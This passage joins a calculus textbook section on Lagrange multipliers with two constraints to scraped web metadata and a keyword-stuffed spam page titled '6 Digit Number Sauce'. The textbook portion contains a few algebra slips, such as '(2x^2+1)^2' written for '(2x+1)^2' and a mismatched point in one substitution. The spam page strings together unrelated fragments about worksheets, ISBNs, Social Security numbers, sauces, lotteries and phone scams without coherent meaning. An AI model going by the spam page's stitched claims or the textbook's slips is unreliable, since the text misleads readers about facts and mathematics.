constraint. ### Problems with Two Constraints The method of Lagrange multipliers can be applied to problems with more than one constraint. In this case the objective function, $$w$$ is a function of three variables: $w=f(x,y,z)$ and it is subject to two constraints: $g(x,y,z)=0 \; \text{and} \; h(x,y,z)=0.$ There are two Lagrange multipliers, $$λ_1$$ and $$λ_2$$, and the system of equations becomes \begin{align*} \vecs ∇f(x_0,y_0,z_0)&=λ_1\vecs ∇g(x_0,y_0,z_0)+λ_2\vecs ∇h(x_0,y_0,z_0) \\[5pt] g(x_0,y_0,z_0)&=0\\[5pt] h(x_0,y_0,z_0)&=0 \end{align*} Example $$\PageIndex{4}$$: Lagrange Multipliers with Two Constraints Find the maximum and minimum values of the function $f(x,y,z)=x^2+y^2+z^2 \nonumber$ subject to the constraints $$z^2=x^2+y^2$$ and $$x+y−z+1=0.$$ Solution: 1. The objective function is $$f(x,y,z)=x^2+y^2+z^2.$$ To determine the constraint functions, we first subtract $$z^2$$ from both sides of the first constraint, which gives $$x^2+y^2−z^2=0$$, so $$g(x,y,z)=x^2+y^2−z^2$$. The second constraint function is $$h(x,y,z)=x+y−z+1.$$ 2. We then calculate the gradients of $$f,g,$$ and $$h$$: \begin{align*} \vecs ∇f(x,y,z)&=2x\hat{\mathbf i}+2y\hat{\mathbf j}+2z\hat{\mathbf k} \\[5pt] \vecs ∇g(x,y,z)&=2x\hat{\mathbf i}+2y\hat{\mathbf j}−2z\hat{\mathbf k} \\[5pt] \vecs ∇h(x,y,z)&=\hat{\mathbf i}+\hat{\mathbf j}−\hat{\mathbf k}. \end{align*} The equation $$\vecs ∇f(x,y,z)=λ_1\vecs ∇g(x,y,z)+λ_2\vecs ∇h(x,y,z)$$ becomes $2x\hat{\mathbf i}+2y\hat{\mathbf j}+2z\hat{\mathbf k}=λ_1(2x\hat{\mathbf i}+2y\hat{\mathbf j}−2z\hat{\mathbf k})+λ_2(\hat{\mathbf i}+\hat{\mathbf j}−\hat{\mathbf k}),$ which can be rewritten as $2x\hat{\mathbf i}+2y\hat{\mathbf j}+2z\hat{\mathbf k}=(2λ_1x+λ_2)\hat{\mathbf i}+(2λ_1y+λ_2)\hat{\mathbf j}−(2λ_1z+λ_2)\hat{\mathbf k}.$ Next, we set the coefficients of $$\hat{\mathbf i}$$ and $$\hat{\mathbf j}$$ equal to each other: \begin{align*}2x&=2λ_1x+λ_2 \\[5pt]2y&=2λ_1y+λ_2 \\[5pt]2z&=−2λ_1z−λ_2. \end{align*} The two equations that arise from the constraints are $$z^2=x^2+y^2$$ and $$x+y−z+1=0$$. Combining these equations with the previous three equations gives \begin{align*} 2x&=2λ_1x+λ_2 \\[5pt]2y&=2λ_1y+λ_2 \\[5pt]2z&=−2λ_1z−λ_2 \\[5pt]z^2&=x^2+y^2 \\[5pt]x+y−z+1&=0. \end{align*} 3. The first three equations contain the variable $$λ_2$$. Solving the third equation for $$λ_2$$ and replacing into the first and second equations reduces the number of equations to four: \begin{align*}2x&=2λ_1x−2λ_1z−2z \\[5pt] 2y&=2λ_1y−2λ_1z−2z\\[5pt] z^2&=x^2+y^2\\[5pt] x+y−z+1&=0. \end{align*} Next, we solve the first and second equation for $$λ_1$$. The first equation gives $$λ_1=\dfrac{x+z}{x−z}$$, the second equation gives $$λ_1=\dfrac{y+z}{y−z}$$. We set the right-hand side of each equation equal to each other and cross-multiply: \begin{align*} \dfrac{x+z}{x−z}&=\dfrac{y+z}{y−z} \\[5pt](x+z)(y−z)&=(x−z)(y+z) \\[5pt]xy−xz+yz−z^2&=xy+xz−yz−z^2 \\[5pt]2yz−2xz&=0 \\[5pt]2z(y−x)&=0. \end{align*} Therefore, either $$z=0$$ or $$y=x$$. If $$z=0$$, then the first constraint becomes $$0=x^2+y^2$$. The only real solution to this equation is $$x=0$$ and $$y=0$$, which gives the ordered triple $$(0,0,0)$$. This point does not satisfy the second constraint, so it is not a solution. Next, we consider $$y=x$$, which reduces the number of equations to three: \begin{align*}y &= x \\[5pt] z^2 &= x^2 +y^2 \\[5pt] x + y -z+1&=0. \end{align*} We substitute the first equation into the second and third equations: \begin{align*} z^2 &= x^2 +x^2 \\[5pt] &= x+x-z+1 =0. \end{align*} Then, we solve the second equation for $$z$$, which gives $$z=2x+1$$. We then substitute this into the first equation, \begin{align*} z^2 &= 2x^2 \\[5pt] (2x^2 +1)^2 &= 2x^2 \\[5pt] 4x^2 + 4x +1 &= 2x^2 \\[5pt] 2x^2 +4x +1 &=0, \end{align*} and use the quadratic formula to solve for $$x$$: $x = \dfrac{-4 \pm \sqrt{4^2 -4(2)(1)} }{2(2)} = \dfrac{-4\pm \sqrt{8}}{4} = \dfrac{-4 \pm 2\sqrt{2}}{4} = -1 \pm \dfrac{\sqrt{2}}{2}.$ Recall $$y=x$$, so this solves for $$y$$ as well. Then, $$z=2x+1$$, so $z = 2x +1 =2 \left( -1 \pm \dfrac{\sqrt{2}}{2} \right) +1 = -2 + 1 \pm \sqrt{2} = -1 \pm \sqrt{2} .$ Therefore, there are two ordered triplet solutions: $\left( -1 + \dfrac{\sqrt{2}}{2} , -1 + \dfrac{\sqrt{2}}{2} , -1 + \sqrt{2} \right) \; \text{and} \; \left( -1 -\dfrac{\sqrt{2}}{2} , -1 -\dfrac{\sqrt{2}}{2} , -1 -\sqrt{2} \right).$ 4. We substitute $$\left(−1+\dfrac{\sqrt{2}}{2},−1+\dfrac{\sqrt{2}}{2}, −1+\sqrt{2}\right)$$ into $$f(x,y,z)=x^2+y^2+z^2$$, which gives \begin{align*} f\left( -1 + \dfrac{\sqrt{2}}{2}, -1 + \dfrac{\sqrt{2}}{2} , -1 + \sqrt{2} \right) &= \left( -1+\dfrac{\sqrt{2}}{2} \right)^2 + \left( -1 + \dfrac{\sqrt{2}}{2} \right)^2 + (-1+\sqrt{2})^2 \\[5pt] &= \left( 1-\sqrt{2}+\dfrac{1}{2} \right) + \left( 1-\sqrt{2}+\dfrac{1}{2} \right) + (1 -2\sqrt{2} +2) \\[5pt] &= 6-4\sqrt{2}. \end{align*} Then, we substitute $$\left(−1−\dfrac{\sqrt{2}}{2}, -1+\dfrac{\sqrt{2}}{2}, -1+\sqrt{2}\right)$$ into $$f(x,y,z)=x^2+y^2+z^2$$, which gives \begin{align*} f\left(−1−\dfrac{\sqrt{2}}{2}, -1+\dfrac{\sqrt{2}}{2}, -1+\sqrt{2} \right) &= \left( -1-\dfrac{\sqrt{2}}{2} \right)^2 + \left( -1 - \dfrac{\sqrt{2}}{2} \right)^2 + (-1-\sqrt{2})^2 \\[5pt] &= \left( 1+\sqrt{2}+\dfrac{1}{2} \right) + \left( 1+\sqrt{2}+\dfrac{1}{2} \right) + (1 +2\sqrt{2} +2) \\[5pt] &= 6+4\sqrt{2}. \end{align*} $$6+4\sqrt{2}$$ is the maximum value and $$6−4\sqrt{2}$$ is the minimum value of $$f(x,y,z)$$, subject to the given constraints. Exercise $$\PageIndex{4}$$ Use the method of Lagrange multipliers to find the minimum value of the function $f(x,y,z)=x^2+y^2+z^2$ subject to the constraints $$2x+y+2z=9$$ and $$5x+5y+7z=29.$$ Hint Use the problem-solving strategy for the method of Lagrange multipliers with two constraints. $$f(2,1,2)=9$$ is a relative minimum of $$f$$, subject to the given constraints ## Key Concepts • An objective function combined with one or more constraints is an example of an optimization problem. • To solve optimization problems, we apply the method of Lagrange multipliers using a four-step problem-solving strategy. ### Key Equations • Method of Lagrange multipliers, one constraint $$\vecs ∇f(x,y)=λ\vecs ∇g(x,y)$$ $$g(x,y)=k$$ • Method of Lagrange multipliers, two constraints $$\vecs ∇f(x_0,y_0,z_0)=λ_1\vecs ∇g(x_0,y_0,z_0)+λ_2\vecs ∇h(x_0,y_0,z_0)$$ $$g(x_0,y_0,z_0)=0$$ $$h(x_0,y_0,z_0)=0$$ ### Glossary constraint an inequality or equation involving one or more variables that is used in an optimization problem; the constraint enforces a limit on the possible solutions for the problem Lagrange multiplier the constant (or constants) used in the method of Lagrange multipliers; in the case of one constant, it is represented by the variable $$λ$$ method of Lagrange multipliers a method of solving an optimization problem subject to one or more constraints objective function the function that is to be maximized or minimized in an optimization problem optimization problem calculation of a maximum or minimum value of a function of several variables, often using Lagrange multipliers
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 1, "mathjax_display_tex": 1, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 3, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.9912946224212646, "perplexity": 219.68558407451417}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2022-27/segments/1656103821173.44/warc/CC-MAIN-20220630122857-20220630152857-00682.warc.gz"}
http://curaben.it/hczb/6-digit-number-sauce.html
# 6 Digit Number Sauce Introduction to Numbers up to $$6$$-Digits. The ISBN 10 digit number consists of four parts. Multiply a 6 by a 2 Digit Numbers; Multiply a 6 by a 3 Digit Numbers; Multiplication Sentences I; Multiplication Sentences II; Multiplication Quiz; Division. If the code on this page does not describe the industry of the business in question, then select the largest applicable code below. Grade: PreK to 2nd. It is even more interesting to apply the same procedure to a 4-digit number. Suresh Aggarwal 295,879 views. Counting Math Numbers. Six is more than 5, so this number needs to be rounded up. Add the answer to its reverse. Decimal digits are any of: 0 1 2 3 4 5 6 7 8 9. Add flour to ground beef and mix well. asked by Donna on August 8, 2015. It is the only practical way to go ensure numerous unique keys over a long periods of time. Each of the remaining digits can be any of the 10 digits and hence there are. (NSW,QLD,VIC,ACT,WA,SA) Number Plate Cover - fits NSW Black and Yellow Number plates Perspex Cover with no lines fitting screws included for one pair Front - 372mm x 134mm Rear - 372 x 134mm Number Plate Advertising Pty Ltd is 100% Australian owned and all covers are manufactured in Australia. Symbol Meanings Example in Symbols Examples in Words > Greater Than More Than Bigger Than Larger Than 7 > 4 7 is greater than 4. Addition Worksheets. This number should completely be unique and non-duplicate. This will give 4 x 6! ways, or 4 x 6 x 5 x 4 x 3 x 2 x 1 ways. The first number is the amount of nitrogen (N), the second number is the amount of phosphate (P 2 O 5) and the third number is the amount of potash (K 2 O). The numbers 32 and 16 are called "two-digit" numbers. Guess the secret number in the magician's hat. Thank you for visiting our website! Below you will be able to find the answer to First double-digit number crossword clue which was last seen on Penny Dell - Easy Crossword, October 12 2018. IXL will be unavailable due to scheduled maintenance Sunday 10 May from 3:00 p. So 180915 would read as September 18, 2015. Visualize the multiplication of two numbers as an area. Algebra Worksheets. Explore our vast selection of chunky, meat, mushroom, cheese sauces and more. 00 Popcorn. Download Copy to Clipboard Copy to phone. Social Security is Changing the Way SSNs are Issued Were you aware that the first three digits of the Social Security Number (SSN) had a geographical significance? Since the inception of SSNs, the first three digits were determined by the Zip Code of the mailing address shown on the application for an SSN -- but this is slated to change in 2011. Each digit in a binary number is called a bit. Total Marketable US Businesses. and affiliated banks, Members FDIC and wholly owned subsidiaries of Bank of America Corporation. Agency Validation Results. 2 1947 to 1951. #N#Need information about classifying your device? Classify Your Medical Device. EZ987654321XX) which is given to each EMS item. Market participants trade RINs. The first digit is in the hundreds place, the second digit is in the tens place and the third digit is in the ones place. ID Card Exp. Resource Updates. Armstrong Numbers Problem Statement. Update: All of this work is aligned to the core math curriculum by grade level. If you do not know the EMS item number, you can obtain this from the sender. An UPC-A bar code is divided into four areas: 1) The number system, 2) The manufacturer code, 3) the product code, and 4) the check digit. Draw to Represent 3-Digit Addition Videos: 6. 8 mg 12 % Total Carbohydrate 21 g 7 %. This agency assigns certain number ranges to national/regional ISBN. From the serial number list, the number of Trek frames or bikes made by Merida late in 86 totaled at least 8251. There are #9# single & #40# double digit numbers. 0m) Random 2 Digit Number Generator Pick Random Numbers. There is only one series for 7-digit numbers -. So I did a little poking around other forums. 4 1960 to 1981. Number 1 Gold Font. Four Digits Magic Prediction. Jul 13, 2016 - Grade 2 Addition Worksheet on adding two 2-digit numbers in columns with carrying Stay safe and healthy. Number 1 Gold Font. Random 6 Digit Number - generate any random number with 6 digits. Recaptcha requires verification. Place Value (6-Digit Numbers) Welcome to the 6-digit place value page. It has a naturally sweet fresh tomato flavor. 1 or 2 1 - 10 1 - 100 4 digit 6 digit Lottery Combinations Roll a Die Mobile Apps. 76)365420; Examine the first two digits of the dividend (36). 6 Add up to four two-digit numbers using strategies based on place value and properties of operations. description:. Generally, businesses need an EIN. The first digit cannot be zero therefore there are 9 possibilities for this digit. Review the 6, 7, 8, and 9 times tables with the vertical multiplication problems in this math printable. This resource from Mathsframe generates random numbers using 'spinners' with 3, 4, 5 or 6 sides. Improve your math knowledge with free questions in "Divide three-digit numbers" and thousands of other math skills. Addition - 6 Digit Numbers Position the cursor in the first answer box, then use the keyboard to type the answer. Some of these codes can be used for imports as well, so they're very versatile. Next i MsgBox valIs End Sub. Algebra Worksheets. Learn about ordering numbers and determining the value of the underlined digit. (The recursive solution is faster for smaller numbers; the log-and-pow solution is faster for larger numbers. 0m) Random 2 Digit Number Generator Pick Random Numbers. To find this number the following predictions are made. Looks like you are using an invalid ZIP code. Update: All of this work is aligned to the core math curriculum by grade level. 10 for $10 Sale. Page 3) Numeration of 4 Digit Numbers Worksheet. Use alpha and/or numeric characters with no spaces or symbols. This is the community version. There are multiple free kindergarten printable worksheets. This multiplication worksheet includes two word problems. To begin the game, Player 1 moves a marker (green square) to a number in the factor list of numbers 1-9 along the. The Anti-Digit Dialing League was a short-lived movement that arose in 1962 and faded, it would seem, in 1964. For example 12001 would represent the. 2) Four digit code: The first two digits represent the year and the remaining two digits represent the week number in a calendar year, e. The check digit is the last digit of this sum. The ISBN 10 digit number consists of four parts. This is a U. Name number meanings are determined by the assignment of numbers to letters of the alphabet. Now, if you make a new 6-digit number as you've described, then this number is actually (A*13+B)*1000 + A*13+B. 0 - Australian and New Zealand Standard Research Classification (ANZSRC), 2008 Latest ISSUE Released at 11:30 AM (CANBERRA TIME) 31/03/2008. When the math game starts you will see the visitors score on the screen. Thus of all the six digit numbers with digits 2,4,3,0,5 and 7 the smallest number will have the smallest digit in the hundreds thousands place. a)21 b) 122 c) 3 012 x 5 x 6 x 4 d) 4 024 e) 313 x 2 x 3 3. Market participants trade RINs. It is even more interesting to apply the same procedure to a 4-digit number. 4 digit or 6 digit numbers? I keep getting calls from either a 4 digit number, 9935 or a 6 digit number, 999902. 64 sec) Insert records in the table using insert command −. Bank Routing Numbers There are 8 digits plus a check digit. Up to three spinners can be used in many ways, such as generating addition, multiplication or up to three digit numbers. Grade 4 Module 3. PREMIUM PASTA SAUCES. Six years were appointed for the land to be sown and. But the 6 & 7 digit numbers (located on the neck block) are just sequential numbers used by all the guitars they built, not just the FG's. I am an even 3-digit number. First 4 digits or Last 4 digits in exact order. 2) Four digit code: The first two digits represent the year and the remaining two digits represent the week number in a calendar year, e. In the first case, you have six digits, 2 of which are the same. Question 154695This question is from textbook Algebra1/2 An Incremental Development: How do you: Write the six-digit number that has the digit 4 in the thousands' place, with each of the remaining digits being 6. Subtract 4, 5 or 6 digit numbers from 6-digit numbers and apply the regrouping concept wherever required. Please take into consideration that similar crossword clues can have different answers so we highly recommend you to search our database of crossword clues as we have over 1 million clues. Sell By Date: Though not required, most egg cartons also contain a “sell by” date beyond which they should not be sold. Clock Black Wall. Cincinnati -7 Indianapolis @ Kansas City (KC -6. Grain and Oilseed Milling. Double Digit Subtraction Regrouping Worksheet Author: HaveFunTeaching. Add four zeroes following that final digit. asked by Donna on August 8, 2015. Imagine you have some data like this. Units Digit. In a large saucepan, brown hamburger, onions and garlic. Account Number does not support checksum validation - Many banks and countries do not support Account Number validation. By now we have travelled a standard journey, starting from $$2$$-digit numbers with place value up to Ten's, and coming up to $$5$$-digit numbers with place value \(10,000. More actions December 25, 2008 at 9:35 pm #197503. Besides the three letters that are not allowed in the VIN itself (I, O and Q), the letters U and Z and the digit 0 are not used for the year code. Subtract the smaller of your two numbers from the larger one. CheckACode Feature Comparison Table. Answer 1 to 13 to find the total number of parking spots. Enter digits from 1 to 9 into the blank spaces. No two digits the same. Minimum Guaranteed Amount of P150,000. Serve Up Classic Meatloaf & More. Extracting 7 digit number from alphanumeric string: snowball: 8/30/09 9:51 AM: Hi, I'm trying to extract a 7 digit number from an alphanumeric string (in Excel 2003)when the 7 digit number can appear anywhere in the string and the string can also contain other. (This applet works well when used in conjunction with the Five Frame applet. This is a free service offered by the Internal Revenue Service and you can get your EIN immediately. Identify numbers as even or odd. Both five-digit and six-digit numbers will always have a three digit square root. 2) Four digit code: The first two digits represent the year and the remaining two digits represent the week number in a calendar year, e. Subtract the smaller of your two numbers from the larger one. ©2020 Kentucky Fried Chicken Canada Company. It is never artificially acidified. Add tomato sauce and tomato paste and stir until smooth. 2 is said to have 3 significant figures. A number 273 corn stick pan is pattern number 930, which might seem a little redundant, as there is no other item 273 nor pattern 930. Date code example: 171220 Note: Exclude hyphens: Enter the 6 digit date code: Iotega Touchscreen: Locate the product serial number label on back of product. 299 ends in a 9, as does 9 3, so the 1's digit of the cube root is 9. For example, using the routing number 789456124, do the following calculation. Skeme, Sauce Walka YouTube Philthy Rich - Feeling Rich Today ft. It calculates simple checksum formula used to validate identification numbers such as credit card numbers. The ISBN 10 digit number consists of four parts. However, giving the 6 digit number causes the table to use spaces at each digit. An contains a six-digit issuer identification number (IIN), an individual account identification number, and a single digit checksum. The program exceeds state requirements and provides the required limits of$100,000 per claim, up to $. the group identifier (language-sharing country group), 2. 6 Find whole-number quotients of whole numbers with up to four-digit dividends and two-digit divisors, using strategies based on place value, the properties of operations, and/or the relationship between multiplication and division. The sum of my digits is 18. Simplifying, the above can be written as. The problem here is that having 4 digit numbers leads to all sorts of problems with zeroes (0001 == 1), out of range errors. Which, from a purely psychological perspective is a better phone number length than 8 digits. See ALL Addition. Minimum Guaranteed Amount of P10,000. How to generates N no of 6 digit unique key (no duplicate) You need a 2 steps procedure - you need to manage a counter which have the task to give unique values. Study of numbers in little different way calling ”selfie numbers” is given by author [8]. An Employer Identification Number (EIN) is also known as a Federal Tax Identification Number, and is used to identify a business entity. LA Times - Sept. on the table in 25 min. When this occurs – the vibrational frequency of the prime number doubles in power. Agriculture, Forestry, Fishing and Hunting. Since 1973, social security numbers have been issued by our central office. Serial number example: J70118150220: Enter the 12 character serial number:. The rest are available for new cars. Some of the worksheets for this concept are Digit values, Module 1 digits place value and reading and writing numbers, Number sense work writing 6 digit numbers in, Comparing 6 digit numbers comparing six digit numbers, Writing numbers work, Decimals work, Grade 5 addition work, Numbers in. The largest number of six digit is 999999. Look at the number line. This 10 or 13-digit number identifies a specific book, an edition of a book, or a book-like product (such as an audiobook). Heinz Chili Sauce. For example, a green background would be (0, 255, 0) in RGB, and 00FF00 in Hex. For example, your ATM pin number should be 4 digits. Write a program to find all Armstrong number in the range of 0 and 999. XXXXXX - a unique 6-digit customer number assigned by UPS Mail Innovations NNNNNNNNNNNNNNNNNNNNNN - a unique number, up to 22 characters, assigned by the shipper to identify a mail piece. Download the Digits and Numbers lyric sheet so your class can sing. Answer 1 to 13 to find the total number of parking spots. It holds the spiritual expression of the maternal instincts that we all contain (whether male or female) and the primal urge to nurture those in need. These are dates to mark events, posts or occasions. One-ring calls may appear to be from phone numbers somewhere in the United States, including three initial digits that resemble U. Unit 3: Multiplication of Whole Numbers. Individuals found performing unauthorized activities are subject to disciplinary action including criminal prosecution. Students find the sum of two - single, double, or triple digit numbers. Next i MsgBox valIs End Sub. Add up to four two-digit numbers using strategies based on place value and properties of operations. Add one the rounding digit and change all the rest of the digits to the right of it to zero. Choose hundredths to round an amount to the nearest cent. Select Draw Dates. As you point out, a 7-digit number cannot have a 5 in it (otherwise, it would have to end in 5, but would have to have one of 2, 4, 6, or 8 in it, so must be even). Draw to Represent 3-Digit Addition Videos: 6. The check digit is the last barcode number that makes sure the barcode is correctly composed. Here are some examples of scientific. Suppose that you want to find the check digit of UPC-A number 72641217542. 1 is a single digit number, but 123 is a 3 digit number. Random Numbers 1-10 | 1-100 | 1-X | Generate Combinations. Resource Updates. MGA of Php 100. See how our founding philosophy is rooted in. I'll cover the following topics in the code samples below: DateTime, Date, Random, Synchronized, Otherwise, Generate, Database, and Random Number. To overcome this issue computer designers invented two methods for storing negative binary numbers: sign-and-magnitude and 2's complement. Grade 4 Module 3. The learning object Modeling Numbers: 3-digit numbers is very similar but only has 3 digits. So you want a six digit number that doesn't have repeating values in it (382945 is good, 235782 is bad). 100 + 011 = 111. 6-Digit Number Bingo contains: Colour Counters [PDF] Number Boards [PDF] Number Cards [PDF] Word Boards [PDF] Word Cards [PDF] Word List [PDF]. As a result of the way multiplication and division occur, the units digit has interesting properties in multiplication and division. IXL will be unavailable due to scheduled maintenance Sunday 10 May from 3:00 p. uxcell Office 12 Band Rubber 0-9 Numbers Digit Numbering Stamp 5 Pcs Gray Red. Rolex released these five-digit reference numbers between the 1980s and the new millennium. 8th Generation Intel® Core™ Processor Family. 970 falls between 2 cubes: 729 (9 3) and 1000 (10 3). If you do not have a cell/mobile phone please contact our customer service team and we can help with this step. Tone Control:1377215. You don't need to use the same self-select PIN forever, you can choose a new one (for use next time) each year. My reason is that the largest 4-digit number in base 10 would be 9999, where each digit is (base number - 1), so if we're working with base 6, then each of the digits of the largest 4-digit base 6 number must be 6 - 1 = 5. Recaptcha requires verification. A 10-digit ISBN cannot be converted to 13-digits merely by placing three digits in front of the 10-digit number. 6 Find whole-number quotients of whole numbers with up to four-digit dividends and two-digit divisors, using strategies based on place value, the properties of operations, and/or the relationship between multiplication and division. This application note explains how the ACQUITY UPLC/ELS system can make macrolide antibiotic analysis quicker and more efficient. Addition: Level 1: single digit Level 2: double digit, no carrying Level 3: : double digit, with carrying Level 4: 3 digits, no carrying Level 5: 3 digits, with carrying Number of questions:. Then reducing the result to a single digit. Comparing Decimals. Most Popular Math Worksheets Addition Addition – 1 Digit Addition – 1 More Addition – 10 more Addition – 2 Digit Addition – 3 Digit Addition – 4 Digit Addition – Add and Match Addition – Add and Multiply Addition – Add Tens Addit. Counting to 100; Counting Objects; Numbers and Words - 1-50; Numbers and Words - 51-99; Words and Numbers; Count Down from 100; Numbers to 100 Quiz; Comparing Numbers. 2nd digit = 9 Number will be available (0 - 9) and 1 Number is already used among 10 3rd digit = 8 Number will be available (0 - 9) and 2 Number is already used among 10 Solutions are written by subject experts who are available 24/7. I don't know what setup you have or need, but you basically need to copy the formula, changing the C3 only once to represent the cell with the first 6-digit number. int isdigit ( int c ); Check if character is decimal digit. As a result of the way multiplication and division occur, the units digit has interesting properties in multiplication and division. Eligible for Free Shipping. Learn more about Hunt's tomatoes, our flashsteaming process, and learn where you can find Hunt's tomato products near you. Dividing double-digit numbers is a lot similar to dividing single-digit numbers. Excludes Newfoundland. Place value worksheets: Build a 6-digit whole number. A friend of mine called today asking me to search the internet for information on his Gibson - he is not a computer person. You don't need to use the same self-select PIN forever, you can choose a new one (for use next time) each year. This resource from Mathsframe generates random numbers using 'spinners' with 3, 4, 5 or 6 sides. Introduction to Negative Numbers 6:27 How to Round Whole Numbers 6:03 Rounding Numbers to the Nearest 1000, 10,000 & 100,000 7:04. My Italian card has a 5 digit PIN, so why would a 4-digit PIN be necessary in Italy?. Toddler Worksheets. Specialty Sauces. Published at Monday, December 23rd 2019, 12:28:08 PM. Next i MsgBox valIs End Sub. If you're looking for a 6-digit lucky number that is for something other than numerology, there may be practitioners who specialize in that type of lucky numbers to ask for assistance. December 20, 2019 Amita Azad. Open a More Account and save. code 17-Aug-12 5:22am. Korea for 6 weeks. Kingpin 3/4 Digit Slimline Covers (VIC)$ 34. Enter your answer, and click to submit. Checks whether c is a decimal digit character. This Number Sense Worksheet may be printed, downloaded or saved and used in your classroom, home school, or other educational environment to help someone learn math. Extracting 7 digit number from alphanumeric string: snowball: 8/30/09 9:51 AM: Hi, I'm trying to extract a 7 digit number from an alphanumeric string (in Excel 2003)when the 7 digit number can appear anywhere in the string and the string can also contain other. Compare and Order Using Ordinal Numbers (Lynn Medland) DOC. 0 to 12 are acceptable. 3/4 cup sugar to taste. Please enter the 19 digit code printed on the back of your B&Q Giftcard and the characters in the image below then click on the 'check balance' button to display the current balance on your Giftcard. Place value worksheets: Build a 6-digit whole number. a)21 b) 122 c) 3 012 x 5 x 6 x 4 d) 4 024 e) 313 x 2 x 3 3. Units Digit. Get free shipping on your qualifying orders of Offistamp® Self-Inking Number Stamp, 6-digit. Each digit is a different place value. Ejari is a system that is governed by RERA to make registration of rental / lease agreements easy and accessible to Owners and Real Estate Management Companies of various categories. Simple Subtraction. Digit 4 Open Space. Topics include writing numbers in standard form, expanded notation, and word name format. No account is necessary to read the comments, but you will need to create a free account in order to contribute. The check digit is the last digit of this sum. SYLLOGISM LESSON#1 _SOME/ALL - Duration: 18:50. Choose some three-digit numbers of your own. Numbers to 100. If you can repeat numbers, then you can simply multiply each digit by the possible number of outcomes. The 13-digit ISBN comprises of five elements. Define decimal notation. This activity will teach students how to line up addition problems and solve them. So let's get started with some practice problems. Add up to four two-digit numbers using strategies based on place value and properties of operations. Obligated parties obtain and then ultimately retire RINs for compliance. But savvy scammers often use international numbers from regions that also begin with three-digit codes – for example, "232" goes to Sierra Leone and "809" goes to the Dominican Republic. Send us a message online Eduterials Limited Room 22B, 22/F, Kiu Yin Commercial Building, 361-363 Lockhart Road, Wanchai, Hong Kong Tel: +85281979067. 6 digit counter can be used for counting number/length/batch, position control of balers controlled by variable frequency motor, and measuring height, position and angle. The 6 digits allow for about 10M possible values, which should be enough for most internal uses. Page 2) Numeration of 4 Digit Numbers Worksheet. Use the tab key or mouse to move to the next question. Okay, time for another challenge. x quarts requires 6x tomatoes and 1x cups of oil. It must be 3 digits, if the Bank Number entered is 3 digits, or 4 digits, if the Bank Number entered is 2 digits, or 6 digits, if the Bank Number is not entered. Search 2 x 10 9 decimal digits of Pi, E, the Square Root of Two and 5 x 10 8 digits of Phi (the Golden Ratio) for the first occurrence of a numeric string, or display a specified number of digits from a given starting position. These are the codes used when filing the 'paperwork' with Customs when you export products overseas. It is called ten. Look at the digit one place to right, "6". There are 6 times as many cars as school buses in the parking lot. The smallest digit among 2,4,3,0,5 and 7 is 0 but if you put 0 in the hundreds thousands place you will have a five digit number. Unit 3: Multiplication of Whole Numbers. Using number shapes in addition to a 2 digit system is quite useful for things like laws where some §§ or Articles have 3 digits, but there’s no time pressure. Choose ones to round a number to the nearest dollar. 1 Identification number: BIC Code (owner prefix) + serial number + check digit 2 Size and type code 3 Combined data plate. I'm an Astronaut, Get me out of here. Please take into consideration that similar crossword clues can have different answers so we highly recommend you to search our database of crossword clues as we have over 1 million clues. The credit card BIN numbers are the numbers that tell the bank which issued the card. After that we can choose the other two digits freely. Download for Windows or Mac OS X. Multiply one-digit whole numbers by multiples of 10. Skip-counting sequences. Digit sums and digital roots can be used for quick divisibility tests: a natural number is divisible by 3 or 9 if and only if its digit sum (or digital root) is divisible by 3 or 9, respectively. Hence you want the next smallest digit, 2, in the hundreds thousands place. 4-digit and 6-digit Lucky Numbers. the last digit MUST be 0, to satisfy 2 and 5 and 10. - #179191772 added by jarredzz at Best toy. Guess the secret number in the magician's hat. Feb 16 - 22, 2020. Serving Size: 1 (257) g. You win if you get. Exotic Foods Lot number is read as follows: The lot number is up to a 9 digit number, the first 5 digits being the date in which the product was produced. T-Mobile, Inc. Grade 4 Module 3. 64 sec) Insert records in the table using insert command −. abcd = a n + b n + c n + d n + In the case of an Armstrong number of 3 digits, the sum of cubes of each digit is equal to the number itself. On the other hand, some models have three digits to describe the size and type of movement. Octal numbers use only the digits 0-7, while hexadecimal numbers use all ten base-10 digits (0-9) and the letters a-f (representing the numbers 10-15). Similarly, hexadecimal notation uses base-16 numbers, representing four bits with each digit. Evaluation Edition. 1 + 100 + 110 = 211 not divisible. A number is divisible by 10 if 0 is at the units place Thus, We need to form 6 digit number whose unit place is 0 So, We need to fill up 5 places with the remaining digits 1, 3, 5, 7, & 9 120 is divisible by 10 as last digit is 0 Thus, Number of 6 digit numbers = 1 × 5 × 4 × 3 × 2 × 1 = 120. Specialty Sauces. Meaning, the attributes of the Number One are doubled. Which hundred is closest to the number?. number must is in between 000000 to 999999 I mean it must contain 6 digits. Get the Answers. That is, the number of possible combinations is 10*10*10*10 or 10^4, which is equal to 10,000. Welcome to the presentation on level 4 division. (can also be vertical) 2 Size and type code. Enter your 6-digit PIN number. 10 for $10 Sale. Pick 3 is drawn twice daily at 12:29 p. Winning Numbers: 6-2-7-1-5-8. (The tenth digit is a check digit used as a computer validity check; it consists of a number between 0 and 9 or an uppercase X (for the arabic numeral 10). 168 of the Code of. Pick Second Digit: x-2-x-x. Cardholder Name. More Than and Less Than < > (Stephanie. shailesh-519005. Send us a message online Eduterials Limited Room 22B, 22/F, Kiu Yin Commercial Building, 361-363 Lockhart Road, Wanchai, Hong Kong Tel: +85281979067. Notice that 521 and 345 have one more digit. 1-10 Number Generator 1-100 Number Generator 4-digit Number Generator 6-digit Number List Randomizer Popular Random Number. Compare and order different numbers, including decimal numbers, and metric quantities involving length, mass, capacity and money. The ISBN 10 digit number consists of four parts. It involves: 1. UPC Lookup Database. The Sauce is a reminder that the best way to experience the miracle of human physical art is in sliced-together edits on a very tiny screen. I mean, when Arnold Schwarzenegger and a Snowman are arguing in front of the 